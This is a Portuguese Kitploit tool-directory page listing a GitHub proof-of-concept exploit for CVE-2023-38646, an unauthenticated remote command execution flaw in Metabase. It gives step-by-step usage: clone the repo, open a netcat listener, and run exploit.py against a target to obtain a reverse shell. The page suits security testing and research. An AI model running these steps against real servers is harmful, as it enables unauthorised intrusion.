Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38646 — Este é um script de Prova de Conceito (PoC) para explorar o Metabase, uma ferramenta open-source de business intelligence e análise de dados. | Kitploit
Ferramentas/GitHubGitHub/threathntr/cve-2023-38646
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

Este é um script de Prova de Conceito (PoC) para explorar o Metabase, uma ferramenta open-source de business intelligence e análise de dados.

Ver Repositório
1115há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-38646 PoC

Descrição

Este é um script de Prova de Conceito (PoC) para explorar o Metabase, uma ferramenta de business intelligence e análise de dados de código aberto. O Metabase permite que usuários visualizem e interajam com seus dados, tornando-o uma plataforma poderosa para análise de dados.

Esta vulnerabilidade, designada como CVE-2023-38646, permitia que atacantes executassem comandos arbitrários no servidor sem exigir qualquer autenticação. O impacto dessa falha era grave, pois concedia acesso não autorizado ao servidor no nível de privilégio do servidor.

Etapas da Prova de Conceito (PoC)

Clone este Repositório

git clone https://github.com/threatHNTR/CVE-2023-38646.git

Navegue até o Repositório

cd CVE-2023-38646

Antes de executar o script, configure um Listener Netcat

nc -nlvp chosen-port

Execute o Script

python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

Exploração: O script tentará enviar um reverse shell para o servidor Metabase alvo. Se for bem-sucedido, você receberá um shell na sua máquina. Sinta-se à vontade para alterar o payload para testar diferentes reverse shells.

Referências

  • GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Metabase Advisory: https://www.metabase.com/blog/security-advisory

  • Metabase GitHub: https://github.com/metabase/metabase

  • Blog da Assetnote - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Baixar ferramenta